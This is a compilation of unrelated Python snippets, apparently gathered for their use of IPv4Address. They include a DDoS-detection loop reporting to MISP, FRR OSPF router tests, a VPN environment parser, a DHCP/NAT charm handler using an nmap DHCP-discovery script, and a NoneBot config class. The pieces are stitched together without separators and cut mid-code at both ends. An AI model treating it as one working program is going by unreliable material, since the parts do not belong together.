DDoS model ddos_model = pickle.load(args.model) ddos_classifier = DDoSClassifier(ddos_model, args.min_threshold) # *** MAIN PROCESSING LOOP *** while True: try: # Receive data try: data = trap.recv() except pytrap.FormatChanged as e: # Automatically detect format fmttype, fmtspec = trap.getDataFmt(0) rec = pytrap.UnirecTemplate(fmtspec) data = e.data if len(data) <= 1: # Terminating message break # Decode received data into python object rec.setData(data) # Only Ipv4 try: victim_ip = IPv4Address(rec.SRC_IP) except Exception as e: logger.info("Received IPv6 address, skipping") continue # Predict class of backscatter like traffic try: duration = DDoSClassifier.DURATION(rec) if duration < args.min_duration: # attack is too short lived to be reported continue if duration > args.max_duration: # attack is too long continue if rec.FLOW_COUNT < args.min_flows: # attack does not have enough flows continue for subnet in CESNET_NET: if victim_ip in subnet: continue ddos = ddos_classifier.predict(rec) except Exception as e: logger.error(e) continue # Report attack using MISP try: if ddos: try: domain = gethostbyaddr(str(victim_ip)) except herror as e: # Do not report for unknown domains continue event = create_ddos_event(rec, geoip_db, victim_ip, domain[0], args.misp_templates_dir) if args.export_to == "misp": try: event_id = misp_instance.add_event( event)['Event']['id'] misp_instance.publish(event_id) except Exception as e: logger.error(e) elif args.export_to in ("c3isp", "c3isp-misp"): logger.debug(f"Uploading event to C3ISP platform.") event_file_path = Path( "misp_event_to_c3isp.json").absolute() with temporary_open(event_file_path, 'w') as event_file: json.dump(event.to_json(), event_file) response = c3isp_upload.upload_to_c3isp( event_file_path) logger.debug(f"Response: {response}") if not response or ('status' in response and response['status'] == 'ERROR'): logger.error("ERROR during upload!") continue if args.export_to == "c3isp-misp": dpo_id = response['content'][ 'additionalProperties']['dposId'] logger.debug(f'Exporting DPO {dpo_id} to MISP.') c3isp_upload.export_misp(dpo_id, logger) except Exception as e: logger.error(str(e)) continue except Exception as e: # Log and re-raise exception logger.error(e) raise e # *** END OF MAIN PROCESSING LOOP *** trap.finalize()
Terminated: 1 2 3 Packet-mode: 11 22 33 Forwarded (F): 1 2 3 Discarded (terminated): 1 Denied (terminated): 1 --------------------------------------------------------------- Total: 11 40 70 """ SHOW_FLOWS_ALL_PARSED_DICT = { 'flows_list': [{ 'app': 'UDPv4', 'destination ip': IPv4Address('10.190.5.2'), 'destination port': 1003, 'reduction': 99, 'since': { 'day': '10', 'hour': '23', 'min': '58', 'month': '02', 'secs': '01', 'year': '2014' }, 'source ip': IPv4Address('10.190.0.1'), 'source port': 406, 'type': 'N' }, { 'app': 'SRDF_V2',
def _decode(self, obj, context, path): return IPv4Address(obj)
def test_ospf_p2p_tc3_p0(request): """OSPF IFSM -Verify state change events on p2p network.""" tc_name = request.node.name write_test_header(tc_name) tgen = get_topogen() # Don't run this test if we have any failure. if tgen.routers_have_failure(): pytest.skip(tgen.errors) global topo step("Bring up the base config as per the topology") reset_config_on_routers(tgen) step("Verify that OSPF is subscribed to multi cast services " "(All SPF, all DR Routers).") step("Verify that interface is enabled in ospf.") step("Verify that config is successful.") dut = "r0" input_dict = { "r0": { "links": { "r3": { "ospf": { "mcastMemberOspfAllRouters": True, "ospfEnabled": True } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) step("Delete the ip address") topo1 = { "r0": { "links": { "r3": { "ipv4": topo["routers"]["r0"]["links"]["r3"]["ipv4"], "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "delete": True, } } } } result = create_interfaces_cfg(tgen, topo1) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) step("Change the ip on the R0 interface") topo_modify_change_ip = deepcopy(topo) intf_ip = topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] = str( IPv4Address(frr_unicode(intf_ip.split("/")[0])) + 3) + "/{}".format( intf_ip.split("/")[1]) build_config_from_json(tgen, topo_modify_change_ip, save_bkup=False) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "r3": { "ospf": { "ipAddress": topo_modify_change_ip["routers"]["r0"]["links"]["r3"] ["ipv4"].split("/")[0], "ipAddressPrefixlen": int(topo_modify_change_ip["routers"]["r0"]["links"] ["r3"]["ipv4"].split("/")[1]), } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) step("Modify the mask on the R0 interface") ip_addr = topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] mask = topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] step("Delete the ip address") topo1 = { "r0": { "links": { "r3": { "ipv4": ip_addr, "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "delete": True, } } } } result = create_interfaces_cfg(tgen, topo1) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) step("Change the ip on the R0 interface") topo_modify_change_ip = deepcopy(topo) intf_ip = topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] topo_modify_change_ip["routers"]["r0"]["links"]["r3"]["ipv4"] = str( IPv4Address(frr_unicode(intf_ip.split("/")[0])) + 3) + "/{}".format(int(intf_ip.split("/")[1]) + 1) build_config_from_json(tgen, topo_modify_change_ip, save_bkup=False) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "r3": { "ospf": { "ipAddress": topo_modify_change_ip["routers"]["r0"]["links"]["r3"] ["ipv4"].split("/")[0], "ipAddressPrefixlen": int(topo_modify_change_ip["routers"]["r0"]["links"] ["r3"]["ipv4"].split("/")[1]), } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) topo1 = { "r0": { "links": { "r3": { "ipv4": topo_modify_change_ip["routers"]["r0"]["links"]["r3"] ["ipv4"], "interface": topo_modify_change_ip["routers"]["r0"]["links"]["r3"] ["interface"], "delete": True, } } } } result = create_interfaces_cfg(tgen, topo1) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) build_config_from_json(tgen, topo, save_bkup=False) step("Change the area id on the interface") input_dict = { "r0": { "links": { "r3": { "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "ospf": { "area": "0.0.0.0" }, "delete": True, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format( tc_name, result) input_dict = { "r0": { "links": { "r3": { "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "ospf": { "area": "0.0.0.1" }, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format( tc_name, result) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "r3": { "ospf": { "area": "0.0.0.1", "ospfEnabled": True } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format( tc_name, result) input_dict = { "r0": { "links": { "r3": { "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "ospf": { "area": "0.0.0.1" }, "delete": True, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format( tc_name, result) input_dict = { "r0": { "links": { "r3": { "interface": topo["routers"]["r0"]["links"]["r3"]["interface"], "ospf": { "area": "0.0.0.0" }, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format( tc_name, result) # Api call verify whether BGP is converged ospf_covergence = verify_ospf_neighbor(tgen, topo) assert ospf_covergence is True, "setup_module :Failed \n Error:" " {}".format( ospf_covergence) write_test_footer(tc_name)
('vpnfd', 'VPNFD', int), # set if OpenConnect invoked in --script-tun/ocproxy mode ('gateway', 'VPNGATEWAY', ip_address), ('tundev', 'TUNDEV', str), ('domain', 'CISCO_DEF_DOMAIN', lambda x: x.split(), []), ('splitdns', 'CISCO_SPLIT_DNS', lambda x: x.split(','), []), ('banner', 'CISCO_BANNER', str), ('myaddr', 'INTERNAL_IP4_ADDRESS', IPv4Address), # a.b.c.d ('mtu', 'INTERNAL_IP4_MTU', int), ('netmask', 'INTERNAL_IP4_NETMASK', IPv4Address), # a.b.c.d ('netmasklen', 'INTERNAL_IP4_NETMASKLEN', int), ('network', 'INTERNAL_IP4_NETADDR', IPv4Address), # a.b.c.d ('dns', 'INTERNAL_IP4_DNS', lambda x: [ip_address(x) for x in x.split()], []), ('nbns', 'INTERNAL_IP4_NBNS', lambda x: [IPv4Address(x) for x in x.split()], []), ('myaddr6', 'INTERNAL_IP6_ADDRESS', IPv6Interface), # x:y::z or x:y::z/p ('netmask6', 'INTERNAL_IP6_NETMASK', IPv6Interface), # x:y:z:: or x:y::z/p ('dns6', 'INTERNAL_IP6_DNS', lambda x: [ip_address(x) for x in x.split()], []), ('nsplitinc', 'CISCO_SPLIT_INC', int, 0), ('nsplitexc', 'CISCO_SPLIT_EXC', int, 0), ('nsplitinc6', 'CISCO_IPV6_SPLIT_INC', int, 0), ('nsplitexc6', 'CISCO_IPV6_SPLIT_EXC', int, 0), ('idle_timeout', 'IDLE_TIMEOUT', int, 600), # OpenConnect v8.06+ ('vpnpid', 'VPNPID', int), # OpenConnect v9.0+ ] def parse_env(environ=os.environ): global vpncenv
def configure(): hookenv.log('Configuring isc-dhcp') managed_network = IPv4Network(config()["managed-network"]) # We know what network we should be managing. This IPNetwork object has the # following properties: # .ip # Original ip from config value # .network # network ip # .netmmask # .broadcast_address # # What we don't know is what interface this network is connected to. The # following code tries to find out: # 1. what interface is connected to that network # 2. what the ip is of that interface # 3. what other interfaces we have, ie interfaces that are unmanaged. # 4. what our public ip is # # Then we do two sanity checks: the broadcast and netmask of that interface # must be the same as for the managed network. # mn_iface = None mn_iface_ip = None unmanaged_ifs = [] public_ip = None for interface in netifaces.interfaces(): af_inet = netifaces.ifaddresses(interface).get(AF_INET) if af_inet and af_inet[0].get('broadcast'): addr = IPv4Address( netifaces.ifaddresses(interface)[AF_INET][0]['addr']) if not addr.is_private: # Can't use is_global in 14.04 because of: https://bugs.python.org/issue21386 # We found #4! public_ip = str(addr) public_if = interface if addr in managed_network: # We found #1 and #2 ! mn_iface = interface mn_iface_ip = str(addr) # Sanity check assert (str(managed_network.broadcast_address) == netifaces. ifaddresses(interface)[AF_INET][0]['broadcast']) assert (str(managed_network.netmask) == netifaces.ifaddresses( interface)[AF_INET][0]['netmask']) else: # to find #3 unmanaged_ifs.append(interface) if not public_ip: # No public ip found, so we'll use the address of the interface # that is used to connect to the internet. public_ip = get_gateway_source_ip() if not mn_iface: # We are not connected to the network we have to manage. We don't know # what to do in this case so just tell that to the admin. We know this # handler will rerun when the config changes. hookenv.status_set( 'blocked', 'Cannot find interface that is connected to network {}.'.format( managed_network)) return # Now that we know what interface we have to manage, let's check if there is # a dhcp server responding to requests from that interface. If there is no # dhcp server, we should install one. output = subprocess.check_output( ['nmap', '--script', 'broadcast-dhcp-discover', '-S', mn_iface_ip], stderr=subprocess.STDOUT, universal_newlines=True) print(output) if 'DHCPOFFER' in output: # pylint: disable=E1135 print('DHCP server found on this network. Will NOT create one.') remove_state('role.dhcp-server') else: print('No DHCP server found on this network, will create one.') set_state('role.dhcp-server') # Configure ourselves as a NAT gateway regardless of network topology so # port-forwarding always works. configure_nat_gateway(mn_iface, [public_if]) # If our default gateway is not part of the managed network then we must # tell the clients on the managed network that we are their default gateway. # Otherwise, just pass our default gateway to the clients. gateway_if, gateway_ip = get_gateway() if gateway_if != mn_iface: print( 'Default gateway is NOT in the managed network so we tell potential clients we are their default gateway.' ) gateway_ip = mn_iface_ip else: print( 'Default gateway is on the managed network so we pass our default gateway to potential clients.' ) # Save these values so other handlers can use them. kv = unitdata.kv() kv.set('mn.iface', mn_iface) kv.set('mn.iface-ip', mn_iface_ip) kv.set('mn.gateway', gateway_ip) kv.set('public-ip', public_ip) # PS: opened-ports uses this value too. set_state('gateway.installed') # Now we let the dhcp-server handlers know that they potentially have to # reconfigure their settings. remove_state('dhcp-server.configured')
def parse_env(environ=os.environ): global vpncenv env = slurpy() for var, envar, maker, *default in vpncenv: if envar in environ: try: val = maker(environ[envar]) except Exception as e: print( 'Exception while setting %s from environment variable %s=%r' % (var, envar, environ[envar]), file=stderr) raise elif default: val, = default else: val = None if var is not None: env[var] = val # IPv4 network is the combination of the network address (e.g. 192.168.0.0) and the netmask (e.g. 255.255.0.0) if env.network: orig_netaddr = env.network env.network = IPv4Network( env.network).supernet(new_prefix=env.netmasklen) if env.network.network_address != orig_netaddr: print( "WARNING: IPv4 network %s/%d has host bits set, replacing with %s" % (orig_netaddr, env.netmasklen, env.network), file=stderr) assert env.network.netmask == env.netmask, \ "IPv4 network (INTERNAL_IP4_{{NETADDR,NETMASK}}) {ad}/{nm} does not match INTERNAL_IP4_NETMASKLEN={nml} (implies /{nmi})".format( ad=orig_netaddr, nm=env.netmask, nml=env.netmasklen, nmi=env.network.netmask) assert env.network.netmask == env.netmask # Need to match behavior of original vpnc-script here # Examples: # 1) INTERNAL_IP6_ADDRESS=fe80::1, INTERNAL_IP6_NETMASK=fe80::/64 => interface of fe80::1/64, network of fe80::/64 # 2) INTERNAL_IP6_ADDRESS=unset, INTERNAL_IP6_NETMASK=fe80::1/64 => interface of fe80::1/64, network of fe80::/64 # 3) INTERNAL_IP6_ADDRESS=2000::1, INTERNAL_IP6_NETMASK=unset => interface of 2000::1/128, network of 2000::1/128 if env.myaddr6 or env.netmask6: if not env.netmask6: env.netmask6 = IPv6Network(env.myaddr6) # case 3 above, /128 env.myaddr6 = IPv6Interface(env.netmask6) env.network6 = env.myaddr6.network else: env.myaddr6 = None env.network6 = None env.myaddrs = list(filter(None, (env.myaddr, env.myaddr6))) # Handle splits env.splitinc = [] env.splitexc = [] for pfx, n in chain((('INC', n) for n in range(env.nsplitinc)), (('EXC', n) for n in range(env.nsplitexc))): ad = IPv4Address(environ['CISCO_SPLIT_%s_%d_ADDR' % (pfx, n)]) nm = IPv4Address(environ['CISCO_SPLIT_%s_%d_MASK' % (pfx, n)]) nml = int(environ['CISCO_SPLIT_%s_%d_MASKLEN' % (pfx, n)]) net = IPv4Network(ad).supernet(new_prefix=nml) if net.network_address != ad: print( "WARNING: IPv4 split network (CISCO_SPLIT_%s_%d_{ADDR,MASK}) %s/%d has host bits set, replacing with %s" % (pfx, n, ad, nml, net), file=stderr) assert net.netmask == nm, \ "IPv4 split network (CISCO_SPLIT_{pfx}_{n}_{{ADDR,MASK}}) {ad}/{nm} does not match CISCO_SPLIT_{pfx}_{n}_MASKLEN={nml} (implies /{nmi})".format( pfx=pfx, n=n, ad=ad, nm=nm, nml=nml, nmi=net.netmask) env['split' + pfx.lower()].append(net) for pfx, n in chain((('INC', n) for n in range(env.nsplitinc6)), (('EXC', n) for n in range(env.nsplitexc6))): ad = IPv6Address(environ['CISCO_IPV6_SPLIT_%s_%d_ADDR' % (pfx, n)]) nml = int(environ['CISCO_IPV6_SPLIT_%s_%d_MASKLEN' % (pfx, n)]) net = IPv6Network(ad).supernet(new_prefix=nml) if net.network_address != ad: print( "WARNING: IPv6 split network (CISCO_IPV6_SPLIT_%s_%d_{ADDR,MASKLEN}) %s/%d has host bits set, replacing with %s" % (pfx, n, ad, nml, net), file=stderr) env['split' + pfx.lower()].append(net) return env
class Config(BaseConfig): """ NoneBot 主要配置。大小写不敏感。 除了 NoneBot 的配置项外,还可以自行添加配置项到 ``.env.{environment}`` 文件中。 这些配置将会在 json 反序列化后一起带入 ``Config`` 类中。 """ # nonebot configs driver: str = "nonebot.drivers.fastapi" """ - 类型: ``str`` - 默认值: ``"nonebot.drivers.fastapi"`` - 说明: NoneBot 运行所使用的 ``Driver`` 。继承自 ``nonebot.driver.BaseDriver`` 。 """ host: IPvAnyAddress = IPv4Address("127.0.0.1") # type: ignore """ - 类型: ``IPvAnyAddress`` - 默认值: ``127.0.0.1`` - 说明: NoneBot 的 HTTP 和 WebSocket 服务端监听的 IP/主机名。 """ port: int = 8080 """ - 类型: ``int`` - 默认值: ``8080`` - 说明: NoneBot 的 HTTP 和 WebSocket 服务端监听的端口。 """ debug: bool = False """ - 类型: ``bool`` - 默认值: ``False`` - 说明: 是否以调试模式运行 NoneBot。 """ # bot connection configs api_root: Dict[str, str] = {} """ - 类型: ``Dict[str, str]`` - 默认值: ``{}`` - 说明: 以机器人 ID 为键,上报地址为值的字典,环境变量或文件中应使用 json 序列化。 - 示例: .. code-block:: default API_ROOT={"123456": "http://127.0.0.1:5700"} """ api_timeout: Optional[float] = 30. """ - 类型: ``Optional[float]`` - 默认值: ``30.`` - 说明: API 请求超时时间,单位: 秒。 """ access_token: Optional[str] = None """ - 类型: ``Optional[str]`` - 默认值: ``None`` - 说明: API 请求以及上报所需密钥,在请求头中携带。 - 示例: .. code-block:: http POST /cqhttp/ HTTP/1.1 Authorization: Bearer kSLuTF2GC2Q4q4ugm3 """ secret: Optional[str] = None """ - 类型: ``Optional[str]`` - 默认值: ``None`` - 说明: HTTP POST 形式上报所需签名,在请求头中携带。 - 示例: .. code-block:: http POST /cqhttp/ HTTP/1.1 X-Signature: sha1=f9ddd4863ace61e64f462d41ca311e3d2c1176e2 """ # bot runtime configs superusers: Set[int] = set() """ - 类型: ``Set[int]`` - 默认值: ``set()`` - 说明: 机器人超级用户。 - 示例: .. code-block:: default SUPER_USERS=[12345789] """ nickname: Union[str, Set[str]] = "" """ - 类型: ``Union[str, Set[str]]`` - 默认值: ``""`` - 说明: 机器人昵称。 """ command_start: Set[str] = {"/"} """ - 类型: ``Set[str]`` - 默认值: ``{"/"}`` - 说明: 命令的起始标记,用于判断一条消息是不是命令。 """ command_sep: Set[str] = {"."} """ - 类型: ``Set[str]`` - 默认值: ``{"."}`` - 说明: 命令的分隔标记,用于将文本形式的命令切分为元组(实际的命令名)。 """ session_expire_timeout: timedelta = timedelta(minutes=2) """ - 类型: ``timedelta`` - 默认值: ``timedelta(minutes=2)`` - 说明: 等待用户回复的超时时间。 - 示例: .. code-block:: default SESSION_EXPIRE_TIMEOUT=120 # 单位: 秒 SESSION_EXPIRE_TIMEOUT=[DD ][HH:MM]SS[.ffffff] SESSION_EXPIRE_TIMEOUT=P[DD]DT[HH]H[MM]M[SS]S # ISO 8601 """ apscheduler_config: dict = {"apscheduler.timezone": "Asia/Shanghai"} """ - 类型: ``dict`` - 默认值: ``{"apscheduler.timezone": "Asia/Shanghai"}`` - 说明: APScheduler 的配置对象,见 `Configuring the Scheduler`_ .. _Configuring the Scheduler: https://apscheduler.readthedocs.io/en/latest/userguide.html#configuring-the-scheduler """ # custom configs # custom configs can be assigned during nonebot.init # or from env file using json loads class Config: extra = "allow" env_file = ".env.prod"
def test_ospf_lan_tc1_p0(request): """ OSPF Hello protocol - Verify DR BDR Elections """ tc_name = request.node.name write_test_header(tc_name) tgen = get_topogen() # Don't run this test if we have any failure. if tgen.routers_have_failure(): pytest.skip(tgen.errors) global topo step("Bring up the base config as per the topology") reset_config_on_routers(tgen) step("Verify that DR BDR DRother are elected in the LAN.") input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "DR"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r0" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step( "Verify that all the routers are in FULL state with DR and BDR " "in the topology" ) input_dict = { "r1": { "ospf": { "neighbors": { "r0": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r1" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step( "Configure DR pririty 100 on R0 and clear ospf neighbors " "on all the routers." ) input_dict = { "r0": { "links": { "s1": { "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"priority": 100}, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) step("Clear ospf neighbours in all routers") for rtr in ["r0", "r1", "r2", "r3"]: clear_ospf(tgen, rtr) step("Verify that DR election is triggered and R0 is elected as DR") input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r0" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step( "Configure DR pririty 150 on R0 and clear ospf neighbors " "on all the routers." ) input_dict = { "r0": { "links": { "s1": { "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"priority": 150}, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) step("Clear ospf neighbours in all routers") for rtr in ["r0", "r1"]: clear_ospf(tgen, rtr) step("Verify that DR election is triggered and R0 is elected as DR") input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r0" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Configure DR priority 0 on R0 & Clear ospf nbrs on all the routers") input_dict = { "r0": { "links": { "s1": { "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"priority": 0}, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) step("Clear ospf neighbours in all routers") for rtr in ["r1"]: clear_ospf(tgen, rtr) step("Verify that DR election is triggered and R0 is elected as DRother") input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "DR"}, "r2": {"state": "2-Way", "role": "DROther"}, "r3": {"state": "2-Way", "role": "DROther"}, } } } } dut = "r0" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step( "Configure DR priority to default on R0 and Clear ospf neighbors" " on all the routers" ) input_dict = { "r0": { "links": { "s1": { "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"priority": 100}, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) step("Clear ospf neighbours in all routers") for rtr in ["r0", "r1"]: clear_ospf(tgen, rtr) step("Verify that DR election is triggered and R0 is elected as DR") input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r0" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Shut interface on R0") dut = "r0" intf = topo["routers"]["r0"]["links"]["s1"]["interface"] shutdown_bringup_interface(tgen, dut, intf, False) result = verify_ospf_neighbor(tgen, topo, dut, lan=True, expected=False) assert result is not True, "Testcase {} : Failed \n Error: {}".format( tc_name, result ) step("No Shut interface on R0") dut = "r0" intf = topo["routers"]["r0"]["links"]["s1"]["interface"] shutdown_bringup_interface(tgen, dut, intf, True) input_dict = { "r0": { "ospf": { "neighbors": { "r1": {"state": "Full", "role": "DR"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } step("Verify that after no shut ospf neighbours are full on R0.") result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Clear ospf on DR router in the topology.") clear_ospf(tgen, "r0") step("Verify that BDR is getting promoted to DR after clear.") step("Verify that all the nbrs are in FULL state with the elected DR.") result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Change the ip on LAN intf on R0 to other ip from the same subnet.") topo_modify_change_ip = deepcopy(topo) intf_ip = topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] = str( IPv4Address(unicode(intf_ip.split("/")[0])) + 3 ) + "/{}".format(intf_ip.split("/")[1]) build_config_from_json(tgen, topo_modify_change_ip, save_bkup=False) step( "Verify that OSPF is in FULL state with other routers with " "newly configured IP." ) result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Change the ospf router id on the R0 and clear ip ospf interface.") change_rid = {"r0": {"ospf": {"router_id": "100.1.1.100"}}} result = create_router_ospf(tgen, topo, change_rid) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) topo["routers"]["r0"]["ospf"]["router_id"] = "100.1.1.100" step("Reload the FRR router") stop_router(tgen, "r0") start_router(tgen, "r0") step( "Verify that OSPF is in FULL state with other routers with" " newly configured router id." ) input_dict = { "r1": { "ospf": { "neighbors": { "r0": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r1" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Reconfigure the original router id and clear ip ospf interface.") change_rid = {"r0": {"ospf": {"router_id": "100.1.1.0"}}} result = create_router_ospf(tgen, topo, change_rid) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) topo["routers"]["r0"]["ospf"]["router_id"] = "100.1.1.0" step("Reload the FRR router") # stop/start -> restart FRR router and verify stop_router(tgen, "r0") start_router(tgen, "r0") step("Verify that OSPF is enabled with router id previously configured.") input_dict = { "r1": { "ospf": { "neighbors": { "r0": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r1" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) write_test_footer(tc_name)
def check_line(line: str, config_keywords: dict) -> int: """Syntax checking single configuration line""" words = line.split() keyword = words[0] # Check if keyword is valid if keyword not in config_keywords: raise (BaseException(f"ERROR: Unknown keyword '{keyword}'")) # Check number of mandatory arguments if len(words) <= config_keywords[keyword].len: raise (BaseException( f"ERROR: Invalid number of arguments for keyword '{keyword}'")) # Array with type for each argument arg_types = config_keywords[keyword].types # Check type for every argument value for i, word in enumerate(words[1:], start=1): if not arg_types: raise (BaseException( f"ERROR: Keyword '{keyword}' takes no arguments")) if i > len(arg_types): raise (BaseException( f"ERROR: Invalid optional argument for keyword '{keyword}'")) # Current argument type arg_type = arg_types[i - 1] # Unprintable characters may also be ASCII characters if not word.isprintable(): raise (BaseException( f"ERROR: Invalid characters in value for keyword '{keyword}'")) if arg_type == ArgTye.STRING: try: val_string = line.split(maxsplit=1)[1] if not val_string.startswith('"') or not val_string.endswith('"')\ or len(val_string) < 3 or val_string.find('"', 1, -1) >= 0: raise (BaseException( f"ERROR: Invalid string format for keyword '{keyword}'" )) return 1 except IndexError: raise (BaseException( f"ERROR: Missing string argument for keyword '{keyword}'")) elif arg_type == ArgTye.ROUTE: # TODO return 0 elif arg_type == ArgTye.IPNET: try: IPv4Network(f"{words[i]}/{words[i+1]}") except IndexError: raise (BaseException( f"ERROR: Missing IP network address part for keyword '{keyword}'" )) except ValueError: raise (BaseException( f"ERROR: Invalid IP network address for keyword '{keyword}'" )) elif arg_type == ArgTye.INT: if not word.isnumeric(): raise (BaseException( f"ERROR: Invalid integer value '{word}' for keyword '{keyword}'" )) elif arg_type == ArgTye.ASCII: try: word.encode("ascii") except UnicodeEncodeError: raise (BaseException( f"ERROR: Invalid ascii value '{word}' for keyword '{keyword}'" )) elif arg_type == ArgTye.ENUM: if not config_keywords[keyword].vals: raise (BaseException( f"ERROR: No enumeration values defined for keyword '{keyword}'" )) for val_enum in config_keywords[keyword].vals[i - 1]: regex = re.compile("^" + val_enum + "$") if regex.match(word): break else: raise (BaseException( f"ERROR: Invalid enumeration value '{word}' for keyword '{keyword}'" )) elif arg_type == ArgTye.IPADDR: try: ip_address = IPv4Address(word) except AddressValueError: raise (BaseException( f"ERROR: Invalid IP address '{word}' for keyword '{keyword}'" )) return 0
def test_ospf_lan_tc2_p0(request): """ OSPF IFSM -Verify state change events on DR / BDR / DR Other """ tc_name = request.node.name write_test_header(tc_name) tgen = get_topogen() # Don't run this test if we have any failure. if tgen.routers_have_failure(): pytest.skip(tgen.errors) global topo step("Bring up the base config as per the topology") reset_config_on_routers(tgen) step( "Verify that OSPF is subscribed to multi cast services " "(All SPF, all DR Routers)." ) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "s1": { "ospf": { "priority": 98, "timerDeadSecs": 4, "area": "0.0.0.3", "mcastMemberOspfDesignatedRouters": True, "mcastMemberOspfAllRouters": True, "ospfEnabled": True, } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Delete the ip address") topo1 = { "r0": { "links": { "r3": { "ipv4": topo["routers"]["r0"]["links"]["s1"]["ipv4"], "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "delete": True, } } } } result = create_interfaces_cfg(tgen, topo1) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Change the ip on the R0 interface") topo_modify_change_ip = deepcopy(topo) intf_ip = 